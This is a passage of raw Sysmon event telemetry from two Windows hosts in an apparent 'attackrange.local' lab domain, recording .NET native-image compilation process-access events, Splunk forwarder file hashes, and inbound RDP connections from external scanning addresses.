14:57:51.998{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-7C0D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000050336Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:52.619{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D8F868994D57FBEE2CB05CCB76B66B9,SHA256=BD5012DA9CB21C2E95A730EBAB2141C6188AA91DAC847DC7F5E1E70251B6AD29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050335Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:52.572{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77883613DBE21F765F556B5F18C71FB5,SHA256=7D7552F2D9572DB9E9357AE1358F8CA60A63A290601EF4B605D1E1D4FA21FC3C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.967{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF1-607E-8D0D-00000000BB01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000076365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.876{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51659-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.951{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF1-607E-8D0D-00000000BB01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.951{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF1-607E-8D0D-00000000BB01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.904{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF1-607E-8C0D-00000000BB01}5672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.889{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF1-607E-8C0D-00000000BB01}5672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.889{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF1-607E-8C0D-00000000BB01}5672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.467{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0910C2F3C1641F0B8F33D41206ECC1B,SHA256=5A062F2606EDBECED61E840FECF29450BAE74ABF3DFEF288C26F70C8932B2AD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000076358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.467{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD57D78D2A9CBE2D2FE0B489AFE49EDA,SHA256=1FC0E16BCE69AE3FD3FE89597BB620361EB6CCE87593C9725066C759EFFDA468,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.248{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF1-607E-8B0D-00000000BB01}5920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.217{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF1-607E-8B0D-00000000BB01}5920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.217{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF1-607E-8B0D-00000000BB01}5920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.154{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF1-607E-8A0D-00000000BB01}5664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.139{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF1-607E-8A0D-00000000BB01}5664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.139{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF1-607E-8A0D-00000000BB01}5664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.092{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF1-607E-890D-00000000BB01}1836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.076{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF1-607E-890D-00000000BB01}1836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.076{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF1-607E-890D-00000000BB01}1836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.029{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF1-607E-880D-00000000BB01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.014{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF1-607E-880D-00000000BB01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.014{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF1-607E-880D-00000000BB01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000050339Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:53.635{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EA72A5728FD5A6EB14E854ECF06F638,SHA256=12465274ECDD30F0B8694C806FF561C50E01FD48E62BE43C6A92459FFB0D610C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050338Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:51.106{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57748-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050337Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:50.981{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62497-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000076398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:53.302{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53022-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 